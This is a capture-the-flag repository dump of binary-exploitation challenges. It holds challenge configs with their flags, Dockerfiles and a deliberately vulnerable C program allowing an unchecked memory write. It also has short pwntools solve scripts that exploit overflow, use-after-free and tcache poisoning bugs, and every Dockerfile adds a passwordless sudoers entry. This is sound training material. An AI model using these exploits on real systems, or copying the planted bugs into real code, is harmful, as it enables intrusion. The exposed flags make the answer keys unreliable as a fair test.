5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{i_gUes3_i_w@s_wR0ng} 2 | -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/src/vuln -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Feedback Service 2 | author: FS 3 | category: pwn 4 | description: | 5 | > You ever heard of the book "To kill a mockingbird"? What about to kill a canary? 
6 | 7 | flags: 8 | - blahaj{canary_master_101} 9 | -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/dist/program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/dist/program -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | feedbackservice: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{canary_master_101} 2 | -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/src/program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback Simulator/src/program -------------------------------------------------------------------------------- /Challenges/Pwn/README.md: -------------------------------------------------------------------------------- 1 | Pwn Challenges -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabyCPP 2 | author: fern 3 | category: pwn 4 | description: My teacher said Object Oriented Programming is good... so I made this epic program! Try to get my flag! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{b4By_C_P_p_p_P_1uwk8198} 13 | 14 | files: 15 | - dist/chal.cpp 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babycpp/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babycpp/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000) #process() 4 | win = elf.sym["_Z3winv"] 5 | p.sendlineafter(b": ", b"5") 6 | p.recvuntil(b"address for you: ") 7 | addr = int(p.recvline().strip(), 16) + 5 + 80 - 16 - 1 8 | payload = flat( 9 | 0, 10 | win, 11 | addr, 12 | addr + 8 13 | ).rjust(80 - 1, b"A") 14 | p.clean(timeout = 0.2) 15 | p.sendline(payload) 16 | print(p.readline().decode()) -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/Dockerfile: 
-------------------------------------------------------------------------------- 1 | FROM debian:12 2 | # Challenge image: installs socat and the i386 runtime libraries, then runs entry.sh as uid 1001. 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN dpkg --add-architecture i386 8 | RUN apt-get update && apt-get install -y socat libc6:i386 libstdc++6:i386 9 | # NOTE(review): the sudoers entry written below gives uid 1001 passwordless root wherever sudo is present; nothing in this file installs sudo, so the entry looks unused and is safest removed from an image that hosts a deliberately exploitable service. 10 | RUN addgroup --gid 1001 nonroot && \ 11 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 12 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 13 | USER 1001 14 | 15 | WORKDIR /srv/app 16 | 17 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babycpp/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babycpp: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/babycpp/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo READY 3 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabyOverflow 2 | author: fern 3 | category: pwn 4 | description: I built this note taking app, can you hack it? 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{4ctuAlLy_UnD3rFl0w} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babyoverflow/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solvescript in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babyoverflow/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000)#process() 4 | p.clean() 5 | p.sendline(b"\x08"*4 + p32(0x1337beef)) 6 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN apt-get update && apt-get 
install -y socat 8 | 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/babyoverflow/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babyoverflow: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/babyoverflow/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Enotes 2 2 | author: fern 3 | category: pwn 4 | description: Introducing enotes 2, the private edition of enotes! Spin up your own server, and take notes with your friends! All connections are interactive too! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{l1F3_i5_A_R4c3_And_1_4m_Th3_r4c3R} 13 | 14 | files: 15 | - dist/enotes.c 16 | - dist/enotes 17 | - dist/ld-linux-x86-64.so.2 18 | - dist/libc.so.6 19 | 20 | connection_info: nc hostname 8000 21 | 22 | state: visible 23 | version: "0.1" 24 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/dist/enotes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/dist/enotes -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/soln/enotes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/soln/enotes -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/soln/libc.so.6: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/soln/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solution in `soln/`. -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # base image: Python 3.11 on slim Debian bookworm 2 | FROM python:3.11-slim-bookworm 3 | 4 | # set the working directory to /app 5 | WORKDIR /app 6 | 7 | # copy the entire build context into the image 8 | COPY . /app 9 | # binary, libc and loader become read/execute-only (555) and the flag read-only (444) for every user 10 | RUN chmod 555 /app/enotes 11 | RUN chmod 555 /app/libc.so.6 12 | RUN chmod 555 /app/ld-linux-x86-64.so.2 13 | RUN chmod 444 /app/flag.txt 14 | # NOTE(review): the sudoers entry written below gives uid 1001 passwordless root wherever sudo is present; nothing in this file installs sudo, so the entry looks unused and is safest removed from an image that hosts a deliberately exploitable service. 15 | RUN addgroup --gid 1001 nonroot && \ 16 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 17 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 18 | USER 1001 19 | 20 | RUN pip install psutil 21 | 22 | # start app.py with the python interpreter as the container's main process 23 | ENTRYPOINT [ "python" ] 24 | 25 | CMD ["app.py" ] 26 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | enotes: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8400" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/enotes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/src/enotes -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congrats! Your flag is: blahaj{l1F3_i5_A_R4c3_And_1_4m_Th3_r4c3R} 2 | -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/enotes/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/enotes/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Notepad 2 | author: fern 3 | category: pwn 4 | description: Try to hack this notepad! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Us3_4FtEr_fRE3} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solvescript in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/solve/sol.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("localhost", 8000) #process() 4 | cls = lambda: p.clean(timeout = 0.1) 5 | def send(x): 6 | p.sendline(x) 7 | cls() 8 | send(b"2") 9 | send(b"a") 10 | send(b"a") 11 | send(b"4") 12 | send(b"1") 13 | send(b"A" * 32 + p64(elf.sym["win"])) 14 | p.sendline(b"3") 15 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY 
./entry.sh /srv/app/entry.sh 5 | COPY ./flag.txt /srv/app/flag.txt 6 | RUN chmod 555 /srv/app/run 7 | RUN chmod 444 /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/entry.sh 9 | RUN apt-get update && apt-get install -y socat 10 | 11 | RUN addgroup --gid 1001 nonroot && \ 12 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 13 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 14 | USER 1001 15 | 16 | WORKDIR /srv/app 17 | 18 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | notepad: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/notepad/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{Us3_4FtEr_fRE3} -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Notepad 2 2 | author: fern 3 | category: pwn 4 | description: First notepad too easy eh? 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Tc4ch3_PoIs0nIng} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | - dist/ld-linux-x86-64.so.2 18 | - dist/libc.so.6 19 | 20 | connection_info: nc hostname 8000 21 | 22 | state: visible 23 | version: "0.1" 24 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. 
-------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | #context.log_level = "DEBUG" 3 | context.binary = elf = ELF("chal") 4 | p = remote("localhost", 8000) #process() 5 | cls = lambda: p.clean(timeout = 0.1) 6 | def sl(x): 7 | p.sendline(x.encode()) 8 | cls() 9 | 10 | sl("1 0") 11 | sl("TEST") 12 | sl("1 1") 13 | sl("TEST") 14 | sl("2 0") 15 | sl("2 1") 16 | sl("3 1") 17 | p.sendline(p64(elf.got["__isoc99_scanf"])) 18 | cls() 19 | sl("1 0") 20 | sl("TEST") 21 | sl("1 1") 22 | p.sendline(p64(elf.sym["win"])) 23 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./libc.so.6 /srv/app/libc.so.6 5 | COPY ./ld-linux-x86-64.so.2 /srv/app/ld-linux-x86-64.so.2 6 | COPY ./entry.sh /srv/app/entry.sh 7 | COPY ./flag.txt /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/run 9 | RUN chmod 555 /srv/app/libc.so.6 10 | RUN chmod 555 /srv/app/ld-linux-x86-64.so.2 11 | RUN chmod 444 /srv/app/flag.txt 12 | RUN chmod 555 /srv/app/entry.sh 13 | RUN apt-get update && apt-get install -y socat 14 | 15 | RUN addgroup --gid 1001 nonroot && \ 16 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 17 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 18 | USER 1001 19 | 20 | WORKDIR /srv/app 21 | 22 | CMD [ "/srv/app/entry.sh" ] 
-------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | notepad2: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congrats! 
Your flag is blahaj{Tc4ch3_PoIs0nIng} -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/notepad2/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/notepad2/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Onewrite 2 | author: fern 3 | category: pwn 4 | description: Surely a single overflow can't be that bad... right? 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{3X1t_h4nDleRs_0vErr4T3d} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | - dist/ld-linux-x86-64.so.2 18 | - dist/libc.so.6 19 | 20 | connection_info: nc hostname 8000 21 | 22 | state: visible 23 | version: "0.1" 24 | -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/chal.c: -------------------------------------------------------------------------------- 1 | // gcc chal.c -O0 -Wl,-z,relro,-z,now -s -o chal 2 | #include 3 | #include 4 | int main(){ // Reads an allocation size, an offset and an unsigned long long value, then stores the value at alloc + off. 5 | setvbuf(stdout, NULL, _IONBF, 0); // all three stdio streams are switched to unbuffered mode 6 | setvbuf(stdin, NULL, _IONBF, 0); 7 | setvbuf(stderr, NULL, _IONBF, 0); 8 | printf("Surely a single overflow can't be that bad... right?\nPlease enter size of your malloc: "); 9 | unsigned int malsz = 0; 10 | scanf("%d", &malsz); // NOTE(review): %d is paired with an unsigned int (%u matches the type); the return value is not checked 11 | unsigned char *alloc = malloc(malsz); // NOTE(review): the result is used below without a NULL check 12 | printf("Cool, you got an alloc to %p\nNow, please select your offset: ", alloc); // prints the allocation's address to the user 13 | unsigned int off = 0; 14 | scanf("%d", &off); 15 | printf("And pray tell, what would you wish to write to there?\n"); 16 | unsigned long long datum = 0; 17 | scanf("%lld", &datum); 18 | *((unsigned long long*)(alloc + off)) = datum; // NOTE(review): intentional challenge bug: off is never compared with malsz, so this store can land outside the allocation; production code would reject any off where off + sizeof(datum) exceeds malsz 19 | puts(NULL); //i find that a segfault is the safest way to exit... we don't want people screwing with exit handlers now do we? 
20 | } -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/chal.c: -------------------------------------------------------------------------------- 1 | // gcc chal.c -O0 -Wl,-z,relro,-z,now -s 2 | #include 3 | #include 4 | int main(){ 5 | setvbuf(stdout, NULL, _IONBF, 0); 6 | setvbuf(stdin, NULL, _IONBF, 0); 7 | setvbuf(stderr, NULL, _IONBF, 0); 8 | printf("Surely a single overflow can't be that bad... 
right?\nPlease enter size of your malloc: "); 9 | unsigned int malsz = 0; 10 | scanf("%d", &malsz); 11 | unsigned char *alloc = malloc(malsz); 12 | printf("Cool, you got an alloc to %p\nNow, please select your offset: ", alloc); 13 | unsigned int off = 0; 14 | scanf("%d", &off); 15 | printf("And pray tell, what would you wish to write to there?\n"); 16 | unsigned long long datum = 0; 17 | scanf("%lld", &datum); 18 | *((unsigned long long*)(alloc + off)) = datum; 19 | puts(NULL); //i find that a segfault is the safest way to exit... we don't want people screwing with exit handlers now do we? 20 | } -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/solve/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/solve/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/solve/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./libc.so.6 /srv/app/libc.so.6 5 | COPY ./ld-linux-x86-64.so.2 /srv/app/ld-linux-x86-64.so.2 6 | COPY ./entry.sh /srv/app/entry.sh 7 | COPY ./flag.txt /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/run 9 | RUN chmod 555 /srv/app/libc.so.6 10 | RUN chmod 555 /srv/app/ld-linux-x86-64.so.2 11 | RUN chmod 444 /srv/app/flag.txt 12 | RUN chmod 555 /srv/app/entry.sh 13 | RUN apt-get update && apt-get install -y socat 
14 | 15 | RUN addgroup --gid 1001 nonroot && \ 16 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 17 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 18 | USER 1001 19 | 20 | WORKDIR /srv/app 21 | 22 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/onewrite/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | onewrite: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/onewrite/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congrats! 
